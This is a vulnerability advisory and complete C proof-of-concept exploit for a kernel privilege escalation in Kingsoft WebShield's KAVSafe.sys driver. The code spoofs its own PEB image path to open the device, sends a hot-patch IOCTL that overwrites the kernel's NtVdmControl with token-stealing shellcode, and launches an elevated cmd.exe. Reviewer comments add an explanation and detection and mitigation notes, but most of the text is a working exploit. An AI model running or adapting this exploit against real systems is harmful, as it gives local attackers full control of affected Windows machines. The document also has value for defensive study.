
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Priv Escalation



Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability
Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability



Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability

VULNERABLE PRODUCTS
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)

Signature Date: 2010-5-23 2:33:54

and

KAVSafe.sys <= 2010.4.14.609
Signature Date: 2010-4-14 13:42:26

DETAILS:
KAVSafe.sys creates a device named \Device\KAVSafe and handles a DeviceIoControl request with IoControlCode = 0x830020d4 that can be used to overwrite arbitrary kernel module data.

EXPLOIT CODE:

/*
 * IOCTL code handled by KAVSafe.sys: device type 0x8300, function 0x835,
 * METHOD_BUFFERED, FILE_ANY_ACCESS, which encodes to 0x830020d4 (the value
 * given in DETAILS above). FILE_ANY_ACCESS means the I/O manager requires no
 * particular access right on the handle to deliver the request; main() opens
 * the device with FILE_READ_ATTRIBUTES only. A driver exposing a kernel-write
 * primitive should at minimum demand a specific access right and restrict the
 * device object's DACL, rather than accept any opener.
 */
#define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS)=0D
/* Prototype of ntdll!NtQueryInformationProcess, resolved at run time with
 * GetProcAddress in main(); the information class is a raw DWORD because the
 * SDK enum is not declared in this file. */
typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)(=0D
						  HANDLE ProcessHandle,=0D
						  DWORD ProcessInformationClass,=0D
						  PVOID ProcessInformation,=0D
						  ULONG ProcessInformationLength,=0D
						  PULONG ReturnLength=0D
    );=0D
=0D
/* Counted ANSI string (local copy of the NT STRING type). It is only used as
 * the DosPath member of RTL_DRIVE_LETTER_CURDIR below and is never read by
 * this program; it exists to keep the later structure layouts correct. */
typedef struct _STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PCHAR Buffer;=0D
} STRING;=0D
typedef STRING *PSTRING;=0D
/* Per-drive-letter current-directory record. RTL_USER_PROCESS_PARAMETERS ends
 * with an array of RTL_MAX_DRIVE_LETTERS of these; nothing in this file reads
 * them, the declaration only pads the layout. */
typedef struct _RTL_DRIVE_LETTER_CURDIR {=0D
    USHORT Flags;=0D
    USHORT Length;=0D
    ULONG TimeStamp;=0D
    STRING DosPath;=0D
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;=0D
/* Counted UTF-16 string (local copy of the NT UNICODE_STRING type). Length and
 * MaximumLength are byte counts: main() sets ImagePathName.Length to
 * wcslen(...) * sizeof(WCHAR). This is the type main() temporarily rewrites in
 * its own PEB. */
typedef struct _UNICODE_STRING {=0D
    USHORT Length;=0D
    USHORT MaximumLength;=0D
    PWSTR  Buffer;=0D
} UNICODE_STRING;=0D
typedef UNICODE_STRING *PUNICODE_STRING;=0D
typedef const UNICODE_STRING *PCUNICODE_STRING;=0D
/* Size of the CurrentDirectores array in RTL_USER_PROCESS_PARAMETERS. */
#define RTL_MAX_DRIVE_LETTERS 32=0D
/* Flag value for RTL_DRIVE_LETTER_CURDIR.Flags; unused in this file. */
#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001=0D
/* Current directory of a process (path plus open handle); declared only so
 * that the fields following it in RTL_USER_PROCESS_PARAMETERS keep their
 * offsets. Not read by this program. */
typedef struct _CURDIR {=0D
    UNICODE_STRING DosPath;=0D
    HANDLE Handle;=0D
} CURDIR, *PCURDIR;=0D
/*
 * Hand-declared layout of the undocumented process-parameters block reached
 * through PEB->ProcessParameters. main() touches only ImagePathName (it swaps
 * the Length and the Buffer contents around the CreateFile call), but every
 * field before it must be declared with the correct size for ImagePathName to
 * land at the right offset. The trailing "// ProcessParameters" and
 * "// NtAllocateVirtualMemory" remarks are carried over from the original
 * header and appear to name where each buffer is allocated.
 */
typedef struct _RTL_USER_PROCESS_PARAMETERS {=0D
    ULONG MaximumLength;=0D
    ULONG Length;=0D
	=0D
    ULONG Flags;=0D
    ULONG DebugFlags;=0D
	=0D
    HANDLE ConsoleHandle;=0D
    ULONG  ConsoleFlags;=0D
    HANDLE StandardInput;=0D
    HANDLE StandardOutput;=0D
    HANDLE StandardError;=0D
	=0D
    CURDIR CurrentDirectory;        // ProcessParameters=0D
    UNICODE_STRING DllPath;         // ProcessParameters=0D
    UNICODE_STRING ImagePathName;   // ProcessParameters=0D
    UNICODE_STRING CommandLine;     // ProcessParameters=0D
    PVOID Environment;              // NtAllocateVirtualMemory=0D
	=0D
    ULONG StartingX;=0D
    ULONG StartingY;=0D
    ULONG CountX;=0D
    ULONG CountY;=0D
    ULONG CountCharsX;=0D
    ULONG CountCharsY;=0D
    ULONG FillAttribute;=0D
	=0D
    ULONG WindowFlags;=0D
    ULONG ShowWindowFlags;=0D
    UNICODE_STRING WindowTitle;     // ProcessParameters=0D
    UNICODE_STRING DesktopInfo;     // ProcessParameters=0D
    UNICODE_STRING ShellInfo;       // ProcessParameters=0D
    UNICODE_STRING RuntimeData;     // ProcessParameters=0D
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ];=0D
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;=0D
/*
 * Truncated Process Environment Block: only the leading fields up to
 * ProcessParameters are declared, which is the only member main()
 * dereferences. Do not use this type to reach anything beyond that field.
 * The PEB lives in the process's own user-mode address space, which is why
 * the program can rewrite it freely — and why a kernel component must not
 * treat its contents as trustworthy.
 */
typedef struct _PEB {=0D
    BOOLEAN InheritedAddressSpace;      // These four fields cannot change unless the=0D
    BOOLEAN ReadImageFileExecOptions;   //=0D
    BOOLEAN BeingDebugged;              //=0D
    BOOLEAN SpareBool;                  //=0D
    HANDLE Mutant;                      // INITIAL_PEB structure is also updated.=0D
	=0D
    PVOID ImageBaseAddress;=0D
    PVOID Ldr;=0D
    struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters;=0D
} PEB, *PPEB;=0D
typedef LONG KPRIORITY;=0D
/* Output buffer of NtQueryInformationProcess with information class 0
 * (ProcessBasicInformation), as called in main(); only PebBaseAddress is
 * used, to locate this process's PEB. */
typedef struct _PROCESS_BASIC_INFORMATION {=0D
    LONG ExitStatus;=0D
    PVOID PebBaseAddress;=0D
    ULONG_PTR AffinityMask;=0D
    KPRIORITY BasePriority;=0D
    ULONG_PTR UniqueProcessId;=0D
    ULONG_PTR InheritedFromUniqueProcessId;=0D
} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION;=0D
/*
 * One loaded-kernel-module record as returned by NtQuerySystemInformation
 * information class 0xb (see main()). main() reads only Module[0].ImageName
 * and takes the text after the last backslash as the kernel image's file name
 * (the code assumes the first entry is the kernel; the "cannot load ntoskrnl!"
 * message reflects that assumption). ImageName is a fixed 256-byte ANSI path.
 */
typedef struct {=0D
    ULONG   Unknown1;=0D
    ULONG   Unknown2;=0D
    PVOID   Base;=0D
    ULONG   Size;=0D
    ULONG   Flags;=0D
    USHORT  Index;=0D
    USHORT  NameLength;=0D
    USHORT  LoadCount;=0D
    USHORT  PathLength;=0D
    CHAR    ImageName[256];=0D
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;=0D
=0D
/* Module-list header plus room for exactly one entry. main() passes
 * sizeof(sysmod) as the buffer length, so at most the first module record can
 * be received, and the NTSTATUS of that call is not checked. */
typedef struct {=0D
    ULONG   Count;=0D
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];=0D
} X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION;=0D
/* Prototype of ntdll!NtQuerySystemInformation, resolved with GetProcAddress
 * in main(); the class is passed as a raw LONG (0xb in main()). */
typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) (=0D
						   LONG SystemInformationClass,=0D
						 PVOID SystemInformation,=0D
						   ULONG SystemInformationLength,=0D
						   PULONG ReturnLength=0D
    );=0D
=0D
/* Pseudo-handle (-1) referring to the calling process, as in the NT headers. */
#define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )=0D
/* Prototype of ntdll!NtVdmControl: two stdcall arguments, 8 bytes of stack.
 * main() calls this user-mode stub after the kernel-side routine has been
 * overwritten with R0ShellCodeXP; the payload's "ret 8" matches this
 * signature. */
typedef LONG (WINAPI *PNT_VDM_CONTROL) (=0D
			   ULONG Service,=0D
			   PVOID ServiceData=0D
    );=0D
/*
 * Ring-0 payload. main() has the driver write these bytes over the kernel's
 * NtVdmControl (see the request layout in main) and then calls the user-mode
 * NtVdmControl stub, so this code executes in kernel mode with the two
 * stdcall arguments of NtVdmControl(Service, ServiceData) on the stack.
 * __declspec(naked): no prologue or epilogue, so the raw bytes from the
 * function entry up to NopNop (the next function in the image) are copied
 * verbatim; main() computes the length as (ULONG)NopNop - (ULONG)R0ShellCodeXP.
 *
 * Every address and offset below is hard-coded for 32-bit Windows XP (per the
 * function name) and is not portable. The page does not document the
 * structures being indexed, so the field readings in the comments are the
 * reviewer's and need confirming against XP symbols; the shape is the classic
 * "copy a privileged process's token into the caller" payload, which is why
 * the WinExec("cmd.exe") in main() afterwards is expected to run elevated.
 */
VOID __declspec(naked) R0ShellCodeXP()=0D
{=0D
	__asm=0D
	{=0D
		// eax = *(0xffdff124): a pointer read from a fixed per-CPU kernel
		// address (assumed: the current thread object on XP — confirm)
		mov eax,0xffdff124=0D
		mov eax,[eax]=0D
		// esi = field at +0x220 of that object (assumed: the owning process
		// object); kept in esi so it can be written to at the end
		mov esi ,dword ptr[eax+0x220]=0D
		mov eax,esi=0D
searchxp:=0D
		// Follow the list link embedded at +0x88 and convert the link
		// address back to the containing object's base
		mov eax,dword ptr[eax+0x88]=0D
		sub eax,0x88=0D
		// Stop at the entry whose field at +0x84 equals 4 (assumed: the
		// process id; 4 is the System process on XP), else keep walking.
		// There is no termination check, so with no match this never exits.
		mov edx,dword ptr[eax+0x84]=0D
		cmp edx,4=0D
		jnz searchxp=0D
		// Copy the pointer-sized field at +0xc8 from the matched entry into
		// the current process's entry (assumed: the access token — this is
		// the step that elevates the calling process)
		mov eax,dword ptr[eax+0xc8]=0D
		mov dword ptr[esi + 0xc8] , eax=0D
		// stdcall return: discard the two DWORD arguments of NtVdmControl
		ret 8 =0D
	}=0D
}=0D
/* End-of-payload marker; never called. main() takes this function's address
 * and subtracts R0ShellCodeXP's to obtain the byte length of the payload, so
 * the only requirement is that the compiler lay it out directly after
 * R0ShellCodeXP. The body itself is irrelevant. */
VOID NopNop()
{
	fputs("nop!\n", stdout);
}
=0D
#include "malloc.h"=0D
/*
 * Proof-of-concept driver for the KAVSafe.sys local privilege escalation.
 * Steps, all visible below:
 *   1. Read Kingsoft's ProgramPath from HKLM\SOFTWARE\Kingsoft\KSWSVC and
 *      build "<ProgramPath>\kavinst.exe".
 *   2. Temporarily rewrite this process's own PEB ImagePathName to that path
 *      while opening \\.\KAVSafe, then restore it. Presumably the driver's
 *      open/IOCTL path checks the caller's image path (not shown on the page);
 *      since the PEB is user-mode memory owned by the caller, such a check is
 *      not a trust boundary — a kernel component must base caller identity on
 *      kernel-held data.
 *   3. Find the running kernel's file name (NtQuerySystemInformation class
 *      0xb), map that file as an ordinary user-mode module and compute the RVA
 *      of its NtVdmControl export.
 *   4. Build the IOCTL request — bytes [0..63] module name, [64..67] RVA,
 *      [68..71] patch length, [72..] patch bytes (R0ShellCodeXP) — and send
 *      IOCTL_HOTPATCH_KERNEL_MODULE so the driver writes the payload over the
 *      kernel routine.
 *   5. Call ntdll!NtVdmControl(0,0) so the patched routine, now the payload,
 *      runs at ring 0, then spawn cmd.exe (expected to inherit the elevated
 *      token).
 *
 * NOTE(review), detection/mitigation: observable artefacts are a non-Kingsoft
 * process opening \Device\KAVSafe and issuing IOCTL 0x830020d4, a process
 * other than NTVDM calling NtVdmControl, and cmd.exe started by this binary.
 * The driver-side fix is to remove or strictly restrict the kernel-write IOCTL
 * (device-object DACL, a specific access right instead of FILE_ANY_ACCESS,
 * kernel-verified caller identity) rather than to trust the caller's PEB.
 *
 * Resource handling is PoC-grade: hdev is leaked on the DeviceIoControl
 * failure path, the two malloc() buffers are never freed, argc/argv are
 * unused, and the ULONG casts of pointers make this 32-bit only.
 */
int main(int argc, char* argv[])=0D
{=0D
=0D
	printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n"=0D
		"Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n"=0D
		"2010-5-23\n"=0D
		"By Lincoin \n\nPress Enter");=0D
	HKEY hkey ; =0D
	// Install path read from the registry; MAX_PATH WCHARs, no slack for the
	// "\kavinst.exe" appended below
	WCHAR InstallPath[MAX_PATH];=0D
	DWORD datatype ; =0D
	// In/out byte size for RegQueryValueExW
	DWORD datasize = MAX_PATH * sizeof(WCHAR);=0D
	// Original PEB ImagePathName.Length, restored after the device is opened
	ULONG oldlen ;=0D
	// Copy of the original ImagePathName buffer contents, restored likewise
	PVOID pOldBufferData = NULL ; =0D
=0D
	// Step 1: locate the Kingsoft install directory. The value type returned
	// in datatype is never checked, and RegQueryValueExW does not guarantee a
	// NUL-terminated string.
	if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS)=0D
	{=0D
		if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS)=0D
		{=0D
			RegCloseKey(hkey);=0D
			printf("KSWebShield not installed\n");=0D
			getchar();=0D
			return 0 ;=0D
		}=0D
=0D
		RegCloseKey(hkey);=0D
	}=0D
	else=0D
	{=0D
		printf("KSWebShield not installed\n");=0D
		getchar();=0D
		return 0 ;=0D
	}=0D
	// Unbounded concatenation into a MAX_PATH buffer: a long ProgramPath
	// value overflows InstallPath.
	wcscat(InstallPath , L"\\kavinst.exe");=0D
=0D
=0D
	PROCESS_BASIC_INFORMATION pbi ; =0D
=0D
	PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ;=0D
	=0D
	// Step 2: find this process's PEB. Neither the GetProcAddress result nor
	// the NTSTATUS of the query is checked.
	pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess");=0D
	=0D
	// Class 0 = ProcessBasicInformation
	pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL);=0D
=0D
	PPEB peb ; =0D
=0D
	peb = (PPEB)pbi.PebBaseAddress;=0D
	// Save the current ImagePathName (length and bytes), then overwrite the
	// existing Buffer in place with the Kingsoft path. Only the new Length's
	// worth of the old buffer is saved; the write is not bounded by
	// MaximumLength, so a path longer than the original buffer overruns it.
	oldlen = peb->ProcessParameters->ImagePathName.Length;=0D
	peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);=0D
	pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);=0D
	RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);=0D
	RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );=0D
	// Open the driver's device while the spoofed image path is in place.
	// Only FILE_READ_ATTRIBUTES is requested; because the IOCTL is defined
	// with FILE_ANY_ACCESS that is enough to send it.
	HANDLE hdev = CreateFile("\\\\.\\KAVSafe" , =0D
		FILE_READ_ATTRIBUTES , =0D
		FILE_SHARE_READ , =0D
		0,=0D
		OPEN_EXISTING , =0D
		0,=0D
		0);=0D
=0D
	if (hdev==INVALID_HANDLE_VALUE)=0D
	{=0D
		// Note: the PEB is left with the spoofed path on this exit.
		printf("cannot open device %u\n", GetLastError());=0D
		getchar();=0D
		return 0 ; =0D
	}=0D
	// Restore the original ImagePathName now that the handle exists.
	RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);=0D
	peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ; =0D
	=0D
=0D
	// Step 3: identify the kernel image and compute the target export's RVA.
	PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation  ;=0D
	pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");=0D
	X_SYSTEM_MODULE_INFORMATION sysmod ; =0D
	HMODULE KernelHandle ; =0D
=0D
	// Class 0xb = SystemModuleInformation; sysmod holds one entry and the
	// NTSTATUS (e.g. a length mismatch) is ignored.
	pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);=0D
	=0D
	// Map the kernel file as a plain user-mode DLL (it is never executed)
	// purely so GetProcAddress can resolve exports. strrchr() returns NULL
	// when ImageName contains no backslash; the +1 is not guarded.
    KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);=0D
	=0D
	if (KernelHandle == 0 )=0D
	{=0D
		printf("cannot load ntoskrnl!\n");=0D
		getchar();=0D
		return 0 ; =0D
	}=0D
	PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");=0D
=0D
	if (pNtVdmControl == 0 )=0D
	{=0D
		printf("cannot find NtVdmControl!\n");=0D
		getchar();=0D
		return 0 ; 		=0D
	}=0D
	// Convert the user-mode VA into an RVA; the driver is given the module
	// name plus this offset, so the result is independent of where the real
	// kernel is loaded.
	pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle  );=0D
=0D
	printf("NtVdmControl = %08x" , pNtVdmControl );=0D
	=0D
	getchar();=0D
	// Step 4: payload length = distance to the next function in the image
	// (see NopNop). pShellCode is computed but never used.
	ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;=0D
	ULONG pShellCode = (ULONG)R0ShellCodeXP; =0D
=0D
=0D
	// Request buffer: 0x48-byte header followed by the patch bytes.
	// malloc() result is not checked.
	PVOID Data = malloc(0x48 + ShellCodeSize);=0D
=0D
	// [0x48..] raw bytes of R0ShellCodeXP
	CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);=0D
	=0D
	=0D
	=0D
	// [0..63] NUL-padded module name; the copy writes 68 bytes, but bytes
	// 64..71 are immediately overwritten by the two fields below.
	CHAR ModuleName[68]= "ntoskrnl.exe" ; =0D
	RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));=0D
	// [64..67] RVA inside that module to overwrite
	*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;=0D
	// [68..71] number of bytes to write
	*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;=0D
	=0D
	ULONG btr ; =0D
	// Ask the driver to perform the kernel write. No output buffer; btr is
	// only there because DeviceIoControl requires the pointer.
	if (!DeviceIoControl(hdev ,=0D
		IOCTL_HOTPATCH_KERNEL_MODULE , =0D
		Data , =0D
		0x48 + ShellCodeSize , =0D
		NULL , =0D
		0,=0D
		&btr , 0 =0D
		))=0D
	{=0D
		// hdev is not closed on this path.
		printf("cannot device io control!%u\n" , GetLastError());=0D
		getchar();=0D
		return 0;=0D
	}=0D
=0D
	CloseHandle(hdev);=0D
=0D
	// Step 5: invoke the (now patched) kernel routine through its ntdll stub.
	// The arguments are irrelevant to the payload, which only pops them.
	PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");=0D
	pR3NtVdmControl(0,0);=0D
	=0D
	// Child inherits this process's token, expected to be elevated by now.
	WinExec("cmd.exe" , SW_SHOW);=0D
	printf("OK!\n ");=0D
=0D
	getchar();=0D
=0D
	return 0; =0D
}=0D
